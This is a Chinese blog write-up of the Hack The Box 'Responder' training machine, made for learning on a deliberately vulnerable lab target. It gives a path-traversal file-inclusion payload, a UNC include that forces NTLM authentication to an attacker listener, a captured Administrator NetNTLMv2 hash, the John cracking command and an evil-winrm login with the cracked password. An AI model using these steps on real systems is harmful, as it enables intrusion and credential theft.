Hacker The Box 之 Responder 7

最新推荐文章于 2023-08-15 06:34:39 发布
最新推荐文章于 2023-08-15 06:34:39 发布
阅读量2.8k 收藏 1
点赞数
分类专栏: Hack The Box 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Angelxiqi/article/details/124178059
版权

第一题

 

 第二题

 echo "10.129.99.77 unika.htb" | sudo tee -a /etc/hosts
关于页面跳转的一个技巧
可以修改hosts文件禁止这种跳转,以kali为例,首先编辑/etc/hosts文件,添加一下IP地址和跳转的地址

 

本题原理

在 /etc/hosts 文件中添加此条目将使浏览器能够将主机名 unika.htb 解析为
 相应的 IP 地址 & 从而使浏览器包含 HTTP 标头 Host: unika.htb 在每个
 浏览器向该 IP 地址发送的 HTTP 请求,这将使服务器响应
 unika.htb 的网页

 

第三题

第四题

第五题

http://unika.htb/index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts

 

第六题

第七题

第八题

第九题

第十题

安装Responder

git pull https://github.com/lgandx/Responder
 如果git发生报错,fatal: 不是 git 仓库(或者任何父目录):.git
只需要 git init就可以解决

 

验证 Responder.conf 是否设置为侦听 SMB 请求。

 

 responder -I tun0  开始监听
并访问http://unika.htb/?page=//10.10.15.174/somefile 
这的IP是连接openvpn后的,不是机子的IP

 

成功获取HaX 

echo "Administrator::DESKTOP-
H3OF232:1122334455667788:7E0A87A2CCB487AD9B76C7B0AEAEE133:0101000000000000005F3214B534D
801F0E8BB688484C96C0000000002000800420044004F00320001001E00570049004E002D004E0048004500
3800440049003400410053004300510004003400570049004E002D004E00480045003800440049003400410
05300430051002E00420044004F0032002E004C004F00430041004C0003001400420044004F0032002E004C
004F00430041004C0005001400420044004F0032002E004C004F00430041004C0007000800005F3214B534D
801060004000200000008003000300000000000000001000000002000000C2FAF941D04DCECC6A7691EA926
30A77E073056DA8C3F356D47C324C6D6D16F0A0010000000000000000000000000000000000009002000630
06900660073002F00310030002E00310030002E00310034002E00320035000000000000000000" > hash.txt

将haxh导入txt中,准备用john爆破 

john --w=/usr/share/wordlists/rockyou.txt.gz hash.txt    开膛手爆破

 

第十一题

第十二题

 最后get shell就好evil-winrm -i 10.129.99.77 -u administrator -p badminton

 

A4n9g7e2l
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
The Browser Hacker's Handbook
05-23
7. **JavaScript安全**:深入JavaScript的安全边界,包括沙箱模型、同源策略和Content Security Policy(CSP),以及如何绕过和强化这些保护。 8. **浏览器漏洞利用**:讲解零日漏洞的概念,如何发现和利用浏览器的...
The-hacker-playbook3最新版PDF
11-03
The-hacker-playbook3最新版PDF,从某安全群里面分享得到,同步共享给大家
Hack the box -- Responder靶机
m0_64815693的博客
12-15 2320
Hack the back 靶场 Responder
文件包含漏洞和hash破解
山兔的博客
10-30 675
Windows是当今世界最主要的操作系统,因为它易于使用的GUI可访问性。大约85%的市场份额已成为攻击的关键操作系统。此外,大多数组织使用Active Directory来设置其Windows域网络。微软聘请NTLM(New Technology LAN Manager)和Kerberos提供认证服务。尽管存在已知漏洞,但即使在新系统上,NTLM 仍被广泛部署,以保持与传统客户端和服务器的兼容性。
Hack-The-Box-Responder
ffff5的博客
03-27 422
Hack The Box初级靶机Responder通关记录!
靶场练习 HTB - Responder
最新发布
GloryGod的博客
08-15 276
今天尝试 HTB 第二阶段的第五个靶场:Responder看他 tags 那么多,感觉很厉害的样子首先直接nmap扫描不知道为什么,我的nmap扫描真的很忙,本想尝试全端口扫描,但慢到我只能尝试一万个端口之内的 -sT 扫描了。。。当然直接打开 80 端口的网页进行查看。
HTB_Responder 综合靶机 菜菜被虐现场实录
网络安全学习
04-26 4387
今天的练习有一点苦恼,啥都不会 😭😭😭😭 文章目录信息收集修改 host 进入网站查看网站功能探测漏洞-文件包含利用 SMB 窃取 NTLM hashNTLM 碰撞获取可用账号密码获取 shell后放答案 信息收集 拿到靶机日常扫描不用说了,-A 竟然什么都没扫描到 ┌──(root💀kali)-[~] └─# nmap -A -T4 10.129.95.234 All 1000 scanned ports on bogon (10.129.95.234) are in ignored states. .
The Hacker Playbook 3
05-17
The hacker playbook第三版(包含mobi,azw3,epub与pdf格式), The Hacker Playbook 3 (THP3) takes your offensive game to the pro tier. With a combination of new strategies, attacks, exploits, tips and ...
The Hacker's Manual 2015
10-14
The Hacker's Manual 黑客手册,讲述基本的个人网络和系统安全技术。 注意是全英文版
The Hacker Playbook 2 无水印pdf
09-25
The Hacker Playbook 2 英文无水印pdf pdf所有页面使用FoxitReader和PDF-XChangeViewer测试都可以打开 本资源转载自网络,如有侵权,请联系上传者或csdn删除 本资源转载自网络,如有侵权,请联系上传者或csdn...
hack the box靶场responder靶机
zr1213159840的博客
04-12 3644
打开靶机,看第一个问题: 问:机器上跑了几个tcp端口? 回答:3个,才开始使用默认扫描方式只扫出来一个80,后来指定了端口返回,扫出来三个端口,分别是80、5985、7680,使用如下命令扫描 nmap -v -A -p1-65535 10.129.212.141 第二个问题: 问:当使用IP进行访问时,被重定向去了哪里? 回答:unika.htb 第三个问题: 问:网页是使用哪种脚本语言写的? 回答:php。 首先在burpsuite中进行抓包,然后对回包进行截取 然后能看到网页是用php
Hack the box -- 靶机渗透测试(TIER1)
wjishuxiaobai的博客
06-22 1429
本文针对Hack the box 靶机TIER1渗透过程进行记录。开启在线靶机,靶机IP为10.129.208.78。2.SQL注入 浏览器输入靶机IP10.129.208.78,页面如下。发现是个登录界面,首先尝试常见密码登录如root:root admin:admin administrator:password,登录失败。 随即尝试SQL注入,用户名输入admin‘#,密码输入 123(可随意输入)。成功登录。 Flag 成功获取开启在线靶机,靶机IP为10.129.246.195。开启在线靶机,靶
[HTB靶场记录]TIER-1(下)
Madess的博客
05-06 884
Crocodile + Rsponder
Hack The Box Starting Point 渗透测试入门靶场 TIER 1 - Responder
Start C的博客
04-19 1164
涉及到SMB,枚举,Apache和WinRM(WinRM是Windows Remote Managementd(win远程管理)的简称。基于Web服务管理(WS-Management)标准,使用80或443端口。这样我们就可以在对方有设置防火墙的情况下远程管理这台服务器) 先看一下旁边的Walkthough,看看本靶场的要求 本实验重点介绍如何利用 Windows 机器上提供的网页上的文件包含漏洞来收集运行 Web 服务器的用户的 NetNTLMv2 质询。我们将使用一个名为 Responder 的实用程
HackTheBox-Intelligence WP
h1nt的博客
10-19 2935
0x01 端口探测 使用nmap对靶机进行探测: nmap -sV -sC 10.10.10.248 比较标准的DC端口,还多了个WEB的80。 0x02 user.txt 进WEB看看,发现在主页目录可以下载文档。主页能下载的文档文件名为2020-01-01-upload.pdf 遂写了脚本进行爆破,将所有的文档下载下来: import requests for month in range(1, 13): for day in range(1, 32):
No.78-HackTheBox-windows-Ethereal-Walkthrough渗透学习
qq_34801745的博客
03-26 511
** HackTheBox-windows-Ethereal-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/157 靶机难度:中级(无/10) 靶机发布日期:2019年2月30日 靶机描述: Ethereal is an “insane” difficulty machine, which showcases...
Hacker The Box 之 Archetype 8
Angelxiqi的博客
04-22 2974
非常非常详细
内网渗透-Responder捕获Win哈希
小刚的博客
08-03 3034
作者:小刚 一位苦于信息安全的萌新小白帽,记得关注给个赞,谢谢 本实验仅用于信息防御教学,切勿用于其它用途 Responder捕获Win哈希实验环境Responder安装ResponderResponder参数获取NTLMv2哈希 实验环境 VM搭建的虚拟测试环境 1.被攻击win7主机192.168.1.130 2.kali 192.168.1.131 3.win7配置 netsh advfirewall set allprofiles state off winrm quickconfig winr.
Hackthebox------Jerry
大方子
11-24 3042
hackthebox网站:https://www.hackthebox.eu   这次我们的靶机叫-Jerry IP:10.10.10.95   ====================================================================================== 1.先用nmap对 目标靶机进行扫描 nmap -sC -sV...
Java编译-The_Hacker’s_Guide_to_Javac1
08-03
"Java编译器黑客指南-Javac1解读" 本文档是关于黑客如何深入理解和操作Java编译器——Javac的入门教程。由David Erni和Adrian Kuhn于2008年3月在伯尔尼大学发布。主要介绍了Javac的内部结构、工作阶段,并通过两个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

A4n9g7e2l

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值